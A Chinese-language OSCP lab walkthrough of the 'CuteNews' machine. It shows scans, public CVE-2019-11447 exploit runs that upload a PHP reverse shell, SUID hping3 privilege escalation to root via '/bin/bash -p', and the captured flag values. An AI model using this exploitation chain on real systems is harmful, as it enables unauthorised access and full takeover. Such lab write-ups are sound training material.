OSCP - Other Machines - CuteNews
主要知识点
- hping3提权
具体步骤
依旧先执行namp,很多端口开放,不过我们先以80端口作为潜在突破口试试
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 16:42 CST
Nmap scan report for 172.16.33.9
Host is up (0.024s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
| 256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_ 256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: 404 Not Found
110/tcp open pop3 Courier pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after: 2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: STLS USER UIDL IMPLEMENTATION(Courier Mail Server) UTF8(USER) PIPELINING LOGIN-DELAY(10) TOP
995/tcp open ssl/pop3 Courier pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after: 2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: TOP USER IMPLEMENTATION(Courier Mail Server) UTF8(USER) UIDL LOGIN-DELAY(10) PIPELINING
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.83 seconds
执行dirb一下,看看80端口有哪些有趣的路径
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.16.33.9
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/quickhits.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/example.php (Status: 200) [Size: 9522]
/LICENSE.txt (Status: 200) [Size: 3119]
/README.md (Status: 200) [Size: 2523]
/uploads/ (Status: 200) [Size: 0]
Progress: 2565 / 2566 (99.96%)
===============================================================
Finished
===============================================================
example.php和uploads看起来挺有意思,并且发现会去cute.calipendula 域名去下载文件,于是乎我们先把ip和host加入到/etc/host路径下,再看看
发现CuteNews正在运行,查询一下相关信息
从CuteNews的github repository上来看,应该还有index.php等文件
访问一下index.php发现 CuteNews 2.1.2版本
并且该版本具有RCE漏洞,搜索一下相关exploit
CuteNews 2.1.2 - Remote Code Execution - PHP webapps Exploit
https://github.com/ColdFusionX/CVE-2019-11447_CuteNews-AvatarUploadRCE
这两个exp我都尝试了,第一个不是很好用,但是至少注册成功创建了用户名和密码
─$ python 48800.py
_____ __ _ __ ___ ___ ___
/ ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ |
/ /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/
\___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/
___ _________
/ _ \/ ___/ __/
/ , _/ /__/ _/
/_/|_|\___/___/
[->] Usage python3 expoit.py
Enter the URL> http://172.16.33.9
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
[-] No hashes were found skipping!!!
================================================================
=============================
Registering a users
=============================
[+] Registration successful with username: hrsPEFXiMa and password: hrsPEFXiMa
=======================================================
Sending Payload
=======================================================
signature_key: cc144629390d2773049c78b2add35fb7-hrsPEFXiMa
signature_dsi: 544f2a694aca87233e0c163f7b330002
logged in user: hrsPEFXiMa
============================
Dropping to a SHELL
============================
command > rev.php
sorry i can't find your webshell try running the exploit again
之后再用第二个exp创建了reverse shell
┌──(kali㉿Timothy)-[~/Documents/GooAnn/172.16.33.9]
└─$ python exploit.py -l http://172.16.33.9 -u hrsPEFXiMa -p hrsPEFXiMa -e hrsPEFXiMa@hack.me
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://172.16.33.9/uploads/avatar_hrsPEFXiMa_hrsPEFXiMa.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
执行sudo -l,发现确实可以无需密码以root身份执行hping3,但是有限制,应该没法作为提权线索
www-data@cute:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on cute:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on cute:
(root) NOPASSWD: /usr/sbin/hping3 --icmp
继续尝试寻找suid,成功提权,还是利用了hping3
www-data@cute:/$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/mount
/usr/sbin/hping3
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
www-data@cute:/$ ./usr/sbin/hping3
./usr/sbin/hping3
hping3> /bin/bash -p
/bin/bash -p
bash-5.0# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-5.0# cat /root/root.txt
cat /root/root.txt
0b18032c2d06d9e738ede9bc24795ff2
bash-5.0# cat /home/fox/user.txt
cat /home/fox/user.txt
dcb8189a0eaf7a690a67785a7299be60
bash-5.0#